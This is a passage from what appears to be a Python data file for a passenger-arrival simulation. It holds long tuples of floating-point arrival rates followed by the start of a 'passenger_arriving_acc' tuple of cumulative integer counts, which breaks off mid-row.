19.40618888888889, 17.988924935900748, 10.0, 12.218987363834422, 12.542933333333336, 18.997960000000003, 11.597904197530866, 13.144940067340068, 15.056632098765432, 16.2), (16.581492911545087, 16.145094101508917, 16.174038957475997, 19.387177366255145, 17.99092960037628, 10.0, 12.177237924634875, 12.459980246913581, 18.979294320987655, 11.557040841335164, 13.131951315625393, 15.032051943301326, 16.2), (16.585168743070195, 16.085365157750342, 16.155551165980796, 19.367978189300413, 17.992735118743752, 10.0, 12.135662002743485, 12.378923456790124, 18.960521975308644, 11.516558500228626, 13.11876383588976, 15.007401554641062, 16.2), (16.588441236267325, 16.02592592592593, 16.137037037037036, 19.34861111111111, 17.99434119732246, 10.0, 12.094335511982571, 12.3, 18.94166666666667, 11.476543209876544, 13.105387205387206, 14.982716049382717, 16.2), (16.591309117813463, 15.966881755829906, 16.11852290809328, 19.329095884773665, 17.995747542431697, 10.0, 12.053334366174454, 12.223446913580247, 18.922752098765432, 11.437081005944217, 13.091831001371743, 14.958030544124373, 16.2), (16.593771114385607, 15.908337997256517, 16.100035116598082, 19.30945226337449, 17.996953860390775, 10.0, 12.01273447914145, 12.149501234567902, 18.903801975308642, 11.398257924096939, 13.078104801097394, 14.933380155464107, 16.2), (16.595825952660736, 15.8504, 16.0816, 19.289700000000003, 17.99795985751897, 10.0, 11.972611764705881, 12.078400000000002, 18.88484, 11.36016, 13.064218181818184, 14.9088, 16.2), (16.597472359315837, 15.793173113854596, 16.0632438957476, 19.26985884773663, 17.998765240135597, 10.0, 11.933042136690068, 12.010380246913583, 18.86588987654321, 11.322873269318702, 13.050180720788127, 14.884325194330135, 16.2), (16.5987090610279, 15.73676268861454, 16.04499314128944, 19.249948559670784, 17.999369714559947, 10.0, 11.894101508916325, 11.945679012345678, 18.846975308641976, 11.286483767718336, 13.036001995261257, 14.859990855052581, 16.2), (16.599534784473914, 15.681274074074077, 16.026874074074076, 19.22998888888889, 17.999772987111317, 10.0, 11.855865795206972, 11.884533333333335, 18.828120000000002, 11.251077530864197, 13.021691582491583, 14.835832098765435, 16.2), (16.59994825633087, 15.626812620027435, 16.00891303155007, 19.209999588477366, 17.99997476410901, 10.0, 11.81841090938433, 11.827180246913583, 18.809347654320987, 11.216740594421584, 13.007259059733137, 14.811884042066758, 16.2), (16.59966658316932, 15.573197822912517, 15.991049519890261, 19.189826784755773, 17.999804728475752, 9.99981441853376, 11.781624311727434, 11.77335016003658, 18.790540557841794, 11.183392706635466, 12.992457581664603, 14.788048035039589, 16.19980024005487), (16.597026731078905, 15.51879283154122, 15.97278148148148, 19.168453623188405, 17.99825708061002, 9.998347325102882, 11.744429090154583, 11.720158024691358, 18.770876543209877, 11.150090225127087, 12.975780542264753, 14.76355035737492, 16.198217592592595), (16.59181726009423, 15.463347935749368, 15.954029492455417, 19.14573939881911, 17.995198902606308, 9.995458009449779, 11.706656215298192, 11.667123914037496, 18.750244627343395, 11.116671239140375, 12.957038218441728, 14.738276418068494, 16.195091735253776), (16.584111457028687, 15.406896269746449, 15.93480013717421, 19.12171760601181, 17.990668926006617, 9.991193293705228, 11.668322655262381, 11.61426538637403, 18.728675537265662, 11.083136574948224, 12.936299793254179, 14.712244699540344, 16.190463820301783), (16.573982608695655, 15.349470967741935, 15.915099999999999, 19.096421739130435, 17.98470588235294, 9.985600000000002, 11.62944537815126, 11.5616, 18.706200000000003, 11.04948705882353, 12.913634449760767, 14.685473684210528, 16.184375), (16.561504001908514, 15.291105163945307, 15.894935665294923, 19.069885292538917, 17.977348503187283, 9.978724950464867, 11.590041352068948, 11.50914531321445, 18.682848742569732, 11.01572351703919, 12.889111371020142, 14.65798185449907, 16.1768664266118), (16.546748923480646, 15.231831992566043, 15.874313717421124, 19.04214176060118, 17.96863552005164, 9.970614967230606, 11.550127545119556, 11.456918884316416, 18.658652491998172, 10.9818467758681, 12.86279974009097, 14.629787692826028, 16.167979252400553), (16.52979066022544, 15.171684587813619, 15.85324074074074, 19.01322463768116, 17.95860566448802, 9.961316872427986, 11.509720925407201, 11.404938271604939, 18.63364197530864, 10.947857661583152, 12.834768740031897, 14.600909681611435, 16.157754629629633), (16.510702498956285, 15.11069608389752, 15.831723319615913, 18.98316741814278, 17.94729766803841, 9.950877488187778, 11.468838461035993, 11.353221033379059, 18.607847919524463, 10.913757000457247, 12.805087553901586, 14.571366303275333, 16.146233710562413), (16.48955772648655, 15.048899615027217, 15.809768038408777, 18.95200359634997, 17.934750262244815, 9.939343636640757, 11.427497120110047, 11.301784727937816, 18.581301051668955, 10.87954561876328, 12.7738253647587, 14.54117604023777, 16.13345764746228), (16.46642962962963, 14.98632831541219, 15.787381481481482, 18.919766666666668, 17.92100217864924, 9.926762139917695, 11.38571387073348, 11.250646913580248, 18.55403209876543, 10.845224342774147, 12.741051355661883, 14.510357374918781, 16.119467592592596), (16.441391495198904, 14.923015319261916, 15.76457023319616, 18.88649012345679, 17.906092148793675, 9.913179820149367, 11.343505681010402, 11.199825148605397, 18.52607178783722, 10.810793998762742, 12.706834709669796, 14.478928789738408, 16.104304698216733), (16.414516610007755, 14.858993760785877, 15.74134087791495, 18.852207461084273, 17.890058904220126, 9.898643499466544, 11.30088951904493, 11.149336991312301, 18.497450845907636, 10.776255413001962, 12.671244609841102, 14.446908767116696, 16.08801011659808), (16.385878260869568, 14.79429677419355, 15.7177, 18.816952173913048, 17.872941176470587, 9.8832, 11.257882352941177, 11.099200000000002, 18.4682, 10.741609411764706, 12.63435023923445, 14.414315789473685, 16.070625), (16.355549734597723, 14.728957493694413, 15.693654183813445, 18.780757756307032, 17.854777697087066, 9.866896143880508, 11.214501150803258, 11.049431732967536, 18.43834997713763, 10.706856821323866, 12.596220780908501, 14.381168339229419, 16.052190500685874), (16.323604318005607, 14.663009053497943, 15.669210013717422, 18.743657702630166, 17.835607197611555, 9.849778753238837, 11.170762880735285, 11.000049748513947, 18.40793150434385, 10.671998467952339, 12.55692541792191, 14.34748489880394, 16.03274777091907), (16.290115297906603, 14.59648458781362, 15.644374074074074, 18.70568550724638, 17.815468409586057, 9.831894650205761, 11.126684510841374, 10.95107160493827, 18.376975308641974, 10.637035177923023, 12.516533333333333, 14.313283950617285, 16.012337962962963), (16.255155961114095, 14.529417230850923, 15.61915294924554, 18.666874664519593, 17.794400064552573, 9.813290656912057, 11.08228300922564, 10.902514860539554, 18.345512117055325, 10.60196777750881, 12.47511371020143, 14.2785839770895, 15.991002229080934), (16.21879959444146, 14.46184011681933, 15.593553223593966, 18.627258668813745, 17.772440894053094, 9.794013595488494, 11.037575343992193, 10.854397073616827, 18.313572656607228, 10.566797092982599, 12.432735731584856, 14.24340346064063, 15.968781721536352), (16.18111948470209, 14.393786379928315, 15.567581481481481, 18.586871014492754, 17.749629629629634, 9.774110288065843, 10.99257848324515, 10.806735802469136, 18.28118765432099, 10.531523950617284, 12.389468580542264, 14.207760883690709, 15.945717592592594), (16.142188918709373, 14.325289154387361, 15.541244307270233, 18.54574519592056, 17.726005002824177, 9.753627556774882, 10.947309395088626, 10.75954860539552, 18.248387837219937, 10.496149176685762, 12.345381440132318, 14.171674728659784, 15.921850994513035), (16.102081183276677, 14.256381574405948, 15.51454828532236, 18.503914707461085, 17.701605745178732, 9.732612223746381, 10.901785047626733, 10.712853040695016, 18.21520393232739, 10.460673597460932, 12.30054349341367, 14.135163477967897, 15.897223079561043), (16.06086956521739, 14.187096774193549, 15.4875, 18.461413043478263, 17.676470588235297, 9.711111111111112, 10.856022408963586, 10.666666666666666, 18.18166666666667, 10.425098039215687, 12.255023923444977, 14.098245614035088, 15.871875000000001), (16.0186273513449, 14.117467887959643, 15.460106035665294, 18.41827369833602, 17.650638263535864, 9.689171040999847, 10.810038447203299, 10.621007041609511, 18.14780676726109, 10.389423328222922, 12.208891913284896, 14.060939619281399, 15.845847908093276), (15.975427828472597, 14.047528049913716, 15.432372976680384, 18.374530166398284, 17.624147502622446, 9.666838835543363, 10.763850130449988, 10.57589172382259, 18.113654961133975, 10.353650290755535, 12.162216645992086, 14.023263976126877, 15.819182956104251), (15.931344283413848, 13.977310394265235, 15.404307407407408, 18.33021594202899, 17.597037037037037, 9.644161316872427, 10.717474426807762, 10.53133827160494, 18.079241975308644, 10.31777975308642, 12.1150673046252, 13.985237166991553, 15.791921296296294), (15.886450002982048, 13.906848055223684, 15.375915912208507, 18.285364519592058, 17.569345598321632, 9.621185307117818, 10.670928304380737, 10.487364243255604, 18.044598536808415, 10.281812541488476, 12.067513072242896, 13.946877674295479, 15.764104080932785), (15.840818273990577, 13.836174166998541, 15.347205075445817, 18.240009393451423, 17.541111918018238, 9.597957628410304, 10.62422873127303, 10.443987197073618, 18.00975537265661, 10.245749482234594, 12.019623131903835, 13.908203980458689, 15.735772462277092), (15.79452238325282, 13.765321863799286, 15.318181481481483, 18.194184057971015, 17.512374727668846, 9.574525102880658, 10.577392675588754, 10.401224691358026, 17.974743209876543, 10.209591401597677, 11.971466666666668, 13.869234567901238, 15.706967592592594), (15.747635617582157, 13.694324279835394, 15.28885171467764, 18.14792200751476, 17.483172758815464, 9.550934552659655, 10.530437105432021, 10.359094284407867, 17.939592775491544, 10.173339125850616, 11.923112859590052, 13.829987919043152, 15.677730624142663), (15.700231263791975, 13.623214549316343, 15.259222359396432, 18.101256736446594, 17.453544743000084, 9.52723279987807, 10.48337898890695, 10.317613534522177, 17.904334796524918, 10.136993481266307, 11.87463089373265, 13.790482516304477, 15.648102709190674), (15.652382608695653, 13.552025806451613, 15.229300000000002, 18.054221739130437, 17.423529411764708, 9.503466666666666, 10.43623529411765, 10.276800000000001, 17.869, 10.100555294117648, 11.826089952153112, 13.750736842105264, 15.618125000000001), (15.60416293910658, 13.480791185450682, 15.19909122085048, 18.00685050993022, 17.393165496651335, 9.479682975156226, 10.389022989168232, 10.236671239140376, 17.833619112940102, 10.064025390677534, 11.777559217910095, 13.710769378865548, 15.58783864883402), (15.555645541838135, 13.409543820523034, 15.168602606310015, 17.959176543209878, 17.36249172920197, 9.455928547477518, 10.34175904216282, 10.19724481024234, 17.798222862368544, 10.027404597218862, 11.72910787406226, 13.670598609005365, 15.557284807956103), (15.506903703703706, 13.338316845878138, 15.13784074074074, 17.911233333333335, 17.331546840958605, 9.432250205761319, 10.294460421205521, 10.15853827160494, 17.762841975308643, 9.990693740014526, 11.680805103668263, 13.63024301494477, 15.526504629629631), (15.458010711516671, 13.267143395725476, 15.1068122085048, 17.86305437466452, 17.300369563463246, 9.408694772138395, 10.247144094400449, 10.120569181527207, 17.72750717878372, 9.953893645337423, 11.632720089786758, 13.589721079103796, 15.495539266117968), (15.409039852090416, 13.196056604274526, 15.075523593964334, 17.814673161567367, 17.268998628257886, 9.385309068739522, 10.199827029851722, 10.083355098308186, 17.692249199817102, 9.91700513946045, 11.584922015476401, 13.549051283902486, 15.464429869684501), (15.360064412238325, 13.125089605734766, 15.043981481481481, 17.766123188405796, 17.237472766884533, 9.362139917695474, 10.152526195663453, 10.046913580246915, 17.6570987654321, 9.880029048656501, 11.537480063795854, 13.508252111760886, 15.433217592592593), (15.311157678773782, 13.054275534315678, 15.012192455418381, 17.717437949543747, 17.205830710885177, 9.339234141137021, 10.105258559939752, 10.011262185642433, 17.622086602652033, 9.842966199198472, 11.490463417803769, 13.46734204509903, 15.401943587105624), (15.26239293851017, 12.983647524226738, 14.980163100137176, 17.66865093934514, 17.174111191801824, 9.31663856119494, 10.058041090784739, 9.976418472793783, 17.58724343850023, 9.805817417359263, 11.443941260558804, 13.426339566336967, 15.370649005486968), (15.21384347826087, 12.913238709677422, 14.947900000000002, 17.619795652173917, 17.14235294117647, 9.294400000000001, 10.010890756302521, 9.942400000000001, 17.5526, 9.768583529411766, 11.397982775119617, 13.38526315789474, 15.339375000000002), (15.16558258483927, 12.843082224877207, 14.915409739369, 17.570905582393987, 17.11059469055112, 9.272565279682976, 9.96382452459722, 9.90922432556013, 17.518187014174668, 9.731265361628877, 11.352657144544864, 13.34413130219238, 15.308162722908094), (15.117683545058746, 12.77321120403558, 14.882698902606315, 17.522014224369297, 17.078875171467768, 9.251181222374639, 9.916859363772943, 9.876909007773206, 17.484035208047555, 9.693863740283494, 11.308033551893201, 13.302962481649942, 15.277053326474624), (15.07021964573269, 12.703658781362009, 14.849774074074077, 17.47315507246377, 17.047233115468412, 9.230294650205762, 9.87001224193381, 9.845471604938272, 17.450175308641978, 9.656379491648512, 11.264181180223286, 13.261775178687461, 15.246087962962964), (15.02326417367448, 12.634458091065975, 14.816641838134434, 17.42436162104133, 17.015707254095055, 9.209952385307119, 9.823300127183934, 9.814929675354367, 17.41663804298125, 9.618813441996826, 11.221169212593775, 13.220587875724977, 15.215307784636488), (14.976806757924871, 12.565757790057525, 14.78338852520331, 17.375734211987265, 16.98428108827793, 9.190191630743222, 9.776841541850832, 9.78536411004897, 17.383540498013794, 9.581287578580367, 11.179078249844586, 13.179508698407085, 15.184710241349155), (14.930369436640104, 12.498235493640857, 14.75047308003459, 17.327663074043738, 16.952629367306123, 9.170967373647843, 9.731229133456928, 9.757138015208191, 17.351390457140898, 9.544504268660452, 11.137990939381115, 13.13905947538076, 15.154040662656056), (14.883815844806392, 12.431915517892875, 14.717915092331708, 17.280135208290847, 16.920652284621763, 9.152229619998023, 9.6864954403065, 9.730244246845935, 17.320199965870064, 9.508520524780923, 11.09784721828335, 13.099260132094162, 15.123210610656603), (14.837087797180216, 12.366701250066724, 14.685651503974197, 17.233065840426246, 16.888301642214046, 9.133934203659356, 9.64256770804463, 9.70460850063839, 17.28989014276453, 9.473269373519276, 11.05856949003437, 13.060037115979753, 15.092171615609425), (14.790127108518035, 12.302496077415555, 14.653619256841578, 17.18637019614759, 16.855529242072176, 9.116036958497425, 9.599373182316404, 9.680156472261736, 17.260382106387524, 9.438683841453006, 11.020080158117253, 13.021316874470001, 15.06087520777316), (14.742875593576338, 12.239203387192518, 14.621755292813388, 17.139963501152533, 16.82228688618535, 9.098493718377823, 9.556839108766905, 9.656813857392155, 17.231596975302296, 9.404696955159615, 10.98230162601508, 12.98302585499736, 15.02927291740644), (14.695275067111588, 12.176726566650768, 14.589996553769158, 17.09376098113873, 16.788526376542755, 9.081260317166132, 9.51489273304121, 9.634506351705832, 17.20345586807207, 9.371241741216595, 10.945156297210925, 12.945090504994296, 14.997316274767892), (14.647267343880259, 12.114969003043454, 14.55827998158842, 17.04767786180383, 16.754199515133596, 9.064292588727945, 9.473461300784406, 9.613159650878949, 17.175879903260093, 9.338251226201448, 10.908566575187866, 12.907437271893276, 14.964956810116156), (14.59879423863883, 12.053834083623727, 14.5265425181507, 17.001629368845496, 16.71925810394707, 9.047546366928849, 9.432472057641569, 9.592699450587691, 17.148790199429598, 9.305658436691674, 10.872454863428986, 12.869992603126756, 14.932146053709857), (14.549797566143766, 11.993225195644738, 14.494721105335538, 16.95553072796137, 16.683653944972374, 9.03097748563443, 9.391852249257788, 9.573051446508238, 17.122107875143822, 9.273396399264763, 10.836743565417363, 12.832682946127202, 14.898835535807633), (14.50021914115155, 11.933045726359639, 14.462752685022458, 16.90929716484911, 16.647338840198707, 9.01454177871028, 9.351529121278142, 9.554141334316773, 17.095754048966008, 9.24139814049822, 10.801355084636072, 12.795434748327075, 14.864976786668116), (14.450000778418648, 11.87319906302158, 14.430574199090993, 16.86284390520638, 16.61026459161526, 8.998195080021983, 9.311429919347711, 9.535894809689482, 17.069649839459384, 9.209596686969538, 10.766211824568192, 12.758174457158841, 14.830521336549939), (14.399084292701534, 11.813588592883713, 14.398122589420678, 16.816086174730817, 16.572383001211236, 8.98189322343513, 9.271481889111582, 9.518237568302546, 17.04371636518719, 9.177925065256215, 10.731236188696803, 12.720828520054958, 14.795420715711726), (14.347411498756685, 11.754117703199192, 14.365334797891038, 16.768939199120087, 16.53364587097583, 8.965592042815308, 9.231612276214832, 9.501095305832148, 17.017874744712667, 9.146316301935748, 10.696350580504982, 12.683323384447895, 14.759626454412127), (14.294924211340579, 11.69468978122116, 14.332147766381608, 16.72131820407184, 16.494005002898238, 8.949247372028104, 9.19174832630255, 9.484393717954474, 16.99204609659905, 9.114703423585638, 10.661477403475807, 12.645585497770107, 14.723090082909758), (14.241564245209673, 11.635208214202777, 14.29849843677192, 16.67313841528373, 16.453412198967666, 8.93281504493911, 9.151817285019812, 9.4680585003457, 16.966151539409577, 9.083019456783381, 10.626539061092359, 12.607541307454062, 14.68576313146326), (14.187273415120451, 11.575576389397186, 14.264323750941504, 16.624315058453412, 16.4118192611733, 8.916250895413912, 9.111746398011702, 9.452015348682016, 16.94011219170748, 9.051197428106473, 10.591457956837715, 12.569117260932218, 14.647597130331262), (14.131993535829388, 11.515697694057547, 14.229560650769887, 16.57476335927854, 16.36917799150434, 8.899510757318094, 9.0714629109233, 9.4361899586396, 16.913849172056, 9.019170364132412, 10.556156494194951, 12.530239805637045, 14.608543609772397), (14.07566642209295, 11.455475515437003, 14.19414607813661, 16.524398543456762, 16.32544019194999, 8.88255046451725, 9.030894069399695, 9.42050802589464, 16.887283599018378, 8.986871291438696, 10.52055707664715, 12.490835389000999, 14.568554100045299), (14.018233888667616, 11.39481324078871, 14.158016974921194, 16.47313583668574, 16.280557664499447, 8.865325850876964, 8.98996711908596, 9.404895246123317, 16.860336591157846, 8.954233236602823, 10.484582107677383, 12.450830458456547, 14.527580131408602), (13.959637750309861, 11.333614257365817, 14.121110283003175, 16.420890464663124, 16.2344822111419, 8.847792750262826, 8.948609305627183, 9.389277315001811, 16.832929267037642, 8.921189226202292, 10.448153990768738, 12.410151461436149, 14.485573234120938), (13.899819821776152, 11.271781952421478, 14.083362944262086, 16.367577653086567, 16.18716563386655, 8.829906996540425, 8.906747874668445, 9.37357992820631, 16.804982745221007, 8.887672286814597, 10.411195129404286, 12.368724845372267, 14.442484938440934), (13.838721917822966, 11.209219713208839, 14.044711900577454, 16.313112627653727, 16.138559734662593, 8.811624423575347, 8.86431007185483, 9.357728781412993, 16.77641814427117, 8.853615445017242, 10.373627927067108, 12.326477057697364, 14.398266774627231), (13.776285853206776, 11.145830926981056, 14.005094093828815, 16.25741061406225, 16.08861631551923, 8.792900865233184, 8.821223142831416, 9.341649570298044, 16.74715658275137, 8.818951727387716, 10.335374787240283, 12.283334545843907, 14.352870272938459), (13.712453442684055, 11.081518980991277, 13.964446465895698, 16.200386838009802, 16.037287178425654, 8.773692155379518, 8.77741433324329, 9.325267990537647, 16.717119179224852, 8.783614160503523, 10.296358113406889, 12.239223757244352, 14.306246963633242), (13.647166501011277, 11.016187262492654, 13.922705958657628, 16.141956525194022, 15.98452412537107, 8.753954127879942, 8.732810888735527, 9.308509737807984, 16.68622705225485, 8.747535770942156, 10.256500309050004, 12.194071139331164, 14.258348376970226), (13.58036684294491, 10.949739158738339, 13.879809513994145, 16.082034901312575, 15.930278958344665, 8.733642616600042, 8.687340054953216, 9.29130050778524, 16.654401320404595, 8.710649585281116, 10.215723777652705, 12.14780313953681, 14.20912604320803), (13.511996283241437, 10.88207805698148, 13.83569407378478, 16.020537192063113, 15.874503479335647, 8.712713455405407, 8.640929077541434, 9.273565996145594, 16.62156310223733, 8.672888630097898, 10.17395092269807, 12.100346205293746, 14.158531492605304), (13.44199663665733, 10.813107344475235, 13.790296579909057, 15.957378623143285, 15.817149490333206, 8.691122478161624, 8.593505202145272, 9.255231898565233, 16.587633516316288, 8.634185931970002, 10.131104147669182, 12.05162678403444, 14.106516255420662), (13.37030971794905, 10.742730408472745, 13.743553974246513, 15.892474420250753, 15.75816879332654, 8.668825518734284, 8.544995674409803, 9.236223910720339, 16.552533681204707, 8.594474517474925, 10.087105856049115, 12.001571323191351, 14.053031861912746), (13.29687734187308, 10.67085063622717, 13.695403198676681, 15.82573980908316, 15.697513190304846, 8.64577841098897, 8.49532773998011, 9.21646772828709, 16.516184715465837, 8.553687413190165, 10.04187845132095, 11.950106270196944, 13.998029842340188), (13.221641323185896, 10.597371414991658, 13.645781195079085, 15.757090015338171, 15.635134483257326, 8.621936988791274, 8.444428644501278, 9.195889046941678, 16.478507737662895, 8.511757645693216, 9.995344336967761, 11.897158072483679, 13.941461726961624), (13.144543476643964, 10.52219613201936, 13.594624905333262, 15.686440264713433, 15.570984474173173, 8.597257086006785, 8.39222563361839, 9.174413562360282, 16.439423866359128, 8.46861824156158, 9.947425916472632, 11.842653177484022, 13.88327904603568), (13.065525617003761, 10.445228174563427, 13.541871271318747, 15.613705782906601, 15.505014965041589, 8.57169453650109, 8.338645952976528, 9.151966970219084, 16.39885422011777, 8.424202227372753, 9.898045593318638, 11.786518032630433, 13.82343332982099), (12.98452955902176, 10.366370929877009, 13.487457234915055, 15.538801795615328, 15.437177757851764, 8.545205174139772, 8.28361684822077, 9.128474966194265, 16.356719917502065, 8.378442629704233, 9.847125770988859, 11.728679085355378, 13.761876108576189), (12.901497117454435, 10.285527785213262, 13.431319738001733, 15.461643528537275, 15.367424654592899, 8.517744832788429, 8.227065564996202, 9.103863245962012, 16.312942077075245, 8.331272475133515, 9.794588852966372, 11.669062783091313, 13.698558912559907), (12.81637010705826, 10.20260212782533, 13.37339572245831, 15.382146207370084, 15.295707457254194, 8.48926934631264, 8.168919348947906, 9.078057505198506, 16.26744181740054, 8.282624790238101, 9.740357242734255, 11.607595573270707, 13.63343327203078), (12.729090342589704, 10.117497344966367, 13.313622130164312, 15.30022505781142, 15.221977967824841, 8.459734548577998, 8.109105445720962, 9.05098343957993, 16.220140257041205, 8.232432601595482, 9.684353343775589, 11.544203903326022, 13.566450717247434), (12.63959963880524, 10.030116823889527, 13.251935902999268, 15.215795305558927, 15.146187988294043, 8.429096273450089, 8.047551100960453, 9.02256674478247, 16.170958514560464, 8.180628935783165, 9.626499559573448, 11.478814220689715, 13.49756277846851), (12.54783981046135, 9.940363951847957, 13.188273982842723, 15.128772176310271, 15.06828932065099, 8.397310354794502, 7.984183560311464, 8.992733116482306, 16.119817708521552, 8.12714681937864, 9.566718293610915, 11.411352972794255, 13.426720985952636), (12.453752672314497, 9.848142116094811, 13.12257331157419, 15.039070895763093, 14.988233766884889, 8.364332626476825, 7.918930069419071, 8.96140825035562, 16.06663895748772, 8.071919278959406, 9.504931949371066, 11.341746607072103, 13.353876869958444), (12.357280039121166, 9.75335470388324, 13.054770831073213, 14.946606689615056, 14.905973128984929, 8.330118922362647, 7.851717873928365, 8.928517842078596, 16.011343380022186, 8.014879341102965, 9.44106293033698, 11.26992157095572, 13.278981960744572), (12.258363725637818, 9.655905102466392, 12.984803483219322, 14.851294783563805, 14.821459208940315, 8.294625076317555, 7.782474219484418, 8.893987587327418, 15.953852094688205, 7.955960032386807, 9.375033639991733, 11.195804311877572, 13.201987788569642), (12.15694554662093, 9.555696699097421, 12.912608209892042, 14.753050403307, 14.734643808740238, 8.257806922207138, 7.71112635173232, 8.85774318177827, 15.894086220049003, 7.8950943793884365, 9.306766481818407, 11.119321277270117, 13.122845883692296), (12.05296731682698, 9.452632881029478, 12.838121952970909, 14.6517887745423, 14.645478730373895, 8.219620293896982, 7.637601516317151, 8.819710321107332, 15.831966874667822, 7.832215408685347, 9.236183859300079, 11.04039891456582, 13.041507776371162), (11.943489514248384, 9.344724993235614, 12.75774712624377, 14.54363133064199, 14.549889769393596, 8.177639162107376, 7.560170753484572, 8.777275123758995, 15.762659346558557, 7.76538546606583, 9.160953204062308, 10.956159302710944, 12.954377375064553), (11.811658827165445, 9.220904511359164, 12.65078050944478, 14.406363454061527, 14.424306095650605, 8.117903436811366, 7.469140421417146, 8.715541652423012, 15.658283617955432, 7.683649590557993, 9.06786709699039, 10.850180037892974, 12.840684235072311), (11.655795351846896, 9.080154765665142, 12.515073532729422, 14.237724016654177, 14.266272210154874, 8.038946073676295, 7.363589997414055, 8.632958703243755, 15.515880363565842, 7.58592904298063, 8.955615213775264, 10.720803118220555, 12.69827297422973), (11.477155287337537, 8.92339338892875, 12.352075155056495, 14.039316006010765, 14.077428998851381, 7.941723586512502, 7.244290313611002, 8.530560852975649, 15.337327627198428, 7.473053109073501, 8.825186647359532, 10.569227950252113, 12.528598471710556), (11.27699483268217, 8.751538013925183, 12.163234335384793, 13.812742409722123, 13.859417347685127, 7.827192489130329, 7.112012202143695, 8.409382678373124, 15.12450345266182, 7.3458510745763705, 8.677570490685794, 10.39665394054607, 12.333115606688533), (11.056570186925597, 8.565506273429639, 11.950000032673124, 13.559606215379095, 13.613878142601102, 7.696309295340116, 6.967526495147841, 8.2704587561906, 14.87928588376465, 7.205152225229, 8.513755836696653, 10.204280495660853, 12.113279258337407), (10.817137549112616, 8.366215800217313, 11.713821205880283, 13.281510410572508, 13.342452269544303, 7.550030518952207, 6.811604024759146, 8.114823663182511, 14.603552964315558, 7.05178584677115, 8.334731778334714, 9.993307022154886, 11.870544305830926), (10.559953118288028, 8.154584227063411, 11.45614681396507, 12.980057982893204, 13.046780614459719, 7.389312673776939, 6.6450156231133155, 7.943511976103274, 14.299182738123168, 6.8865812249425815, 8.141487408542579, 9.764932926586592, 11.606365628342832), (10.286273093496636, 7.931529186743127, 11.178425815886285, 12.656851919932002, 12.728504063292343, 7.215112273624654, 6.468532122346058, 7.757558271707324, 13.968053248996117, 6.71036764548306, 7.935011820262847, 9.520357615514403, 11.322198105046873), (9.997353673783238, 7.6979683120316595, 10.882107170602728, 12.31349520927975, 12.389263501987168, 7.028385832305694, 6.28292435459308, 7.557997126749083, 13.61204254074304, 6.523974394132343, 7.716294106438124, 9.260780495496734, 11.019496615116793), (9.694451058192634, 7.454819235704206, 10.568639837073198, 11.951590838527274, 12.030699816489188, 6.830089863630398, 6.088963151990087, 7.345863117982976, 13.233028657172568, 6.328230756630195, 7.48632336001101, 8.987400973092019, 10.69971603772634), (9.378821445769624, 7.202999590535967, 10.239472774256495, 11.572741795265413, 11.654453892743392, 6.621180881409112, 5.887419346672787, 7.122190822163432, 12.832889642093342, 6.123966018716379, 7.24608867392411, 8.701418454858675, 10.364311252049257), (9.051721035559014, 6.94342700930214, 9.896054941111416, 11.178551067084992, 11.262166616694774, 6.402615399452171, 5.679063770776885, 6.888014816044876, 12.413503539313982, 5.912009466130653, 6.996579141120026, 8.404032347355134, 10.014737137259289), (8.7144060266056, 6.677019124777921, 9.539835296596765, 10.770621641576858, 10.85547887428833, 6.175349931569918, 5.464667256438089, 6.644369676381733, 11.976748392643131, 5.693190384612782, 6.738783854541357, 8.096442057139818, 9.652448572530185), (8.368132617954185, 6.4046935697385114, 9.172262799671339, 10.350556506331834, 10.436031551469046, 5.940340991572694, 5.245000635792105, 6.392289979928433, 11.524502245889417, 5.468338059902528, 6.473691907130711, 7.779846990771154, 9.278900437035686), (8.014157008649567, 6.127367976959108, 8.79478640929394, 9.919958648940762, 10.005465534181923, 5.69854509327084, 5.02083474097464, 6.132810303439398, 11.058643142861477, 5.238281777739651, 6.202292391830685, 7.45544655480756, 8.89554760994954), (7.6537353977365505, 5.845959979214909, 8.408855084423363, 9.480431056994465, 9.565421708371947, 5.450918750474696, 4.792940404121401, 5.866965223669057, 10.581049127367942, 5.003850823863915, 5.9255744015838845, 7.124440155807469, 8.503844970445494), (7.288123984259929, 5.561387209281111, 8.015917784018413, 9.033576718083788, 9.11754095998411, 5.198418476994606, 4.562088457368093, 5.595789317371834, 10.09359824321745, 4.765874484015079, 5.644527029332911, 6.788027200329303, 8.105247397697292), (6.91857896726451, 5.274567299932917, 7.617423467037885, 8.58099861979956, 8.663464174963408, 4.942000786640907, 4.329049732850424, 5.3203171613021585, 9.598168534218628, 4.525182043932907, 5.360139368020368, 6.447407094931487, 7.701209770878679), (6.546356545795092, 4.986417883945522, 7.214821092440582, 8.124299749732613, 8.204832239254838, 4.682622193223941, 4.094595062704101, 5.0415833322144525, 9.096638044180112, 4.282602789357159, 5.073400510588858, 6.103779246172446, 7.2931869691634), (6.172712918896475, 4.697856594094126, 6.809559619185302, 7.665083095473786, 7.743286038803382, 4.421239210554052, 3.859495279064828, 4.760622406863145, 8.590884816910537, 4.0389660060276, 4.78529954998098, 5.758343060610604, 6.882633871725203), (0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0))
passenger_arriving_acc = ((6, 7, 5, 12, 5, 4, 3, 0, 3, 0, 0, 1, 0, 12, 9, 9, 3, 5, 2, 3, 2, 3, 0, 1, 2, 0), (14, 19, 7, 14, 13, 7, 6, 1, 5, 2, 1, 1, 0, 26, 19, 16, 9, 10, 6, 7, 5, 9, 3, 3, 4, 0), (21, 30, 17, 22, 19, 9, 10, 5, 10, 3, 3, 2, 0, 36, 26, 22, 18, 17, 11, 10, 9, 13, 7, 3, 5, 0), (28, 36, 28, 37, 25, 13, 14, 10, 13, 5, 5, 4, 0, 46, 36, 27, 23, 29, 14, 17, 11, 15, 11, 3, 5, 0), (38, 49, 39, 46, 33, 19, 19, 12, 14, 7, 5, 4, 0, 55, 39, 29, 29, 37, 22, 22, 17, 19, 14, 7, 5, 0), (52, 59, 52, 54, 41, 24, 26, 16, 18, 8, 6, 6, 0, 64, 49, 36, 33, 47, 28, 24, 21, 22, 15, 8, 5, 0), (68, 66, 59, 62, 50, 31, 32, 17, 23, 9, 8, 7, 0, 72, 58, 43, 39, 51, 32, 28, 26, 27, 18, 9, 5, 0), (89, 89, 64, 74, 58, 37, 36, 22, 25, 10, 10, 8, 0, 82, 65, 46, 47, 61, 37, 38, 31, 31, 24, 11, 5, 0), (103, 105, 73, 87, 62, 42, 40, 27, 32, 12, 13, 8, 0, 100, 78, 54, 56, 71, 43, 40, 37, 34, 27, 13, 5, 0), (118, 123, 87, 100, 74, 49, 44, 33, 40, 13, 13, 8, 0, 116, 84, 67, 63, 74, 51, 44, 39, 42, 33, 14, 5, 0), (135, 138, 97, 112, 78, 51, 49, 38, 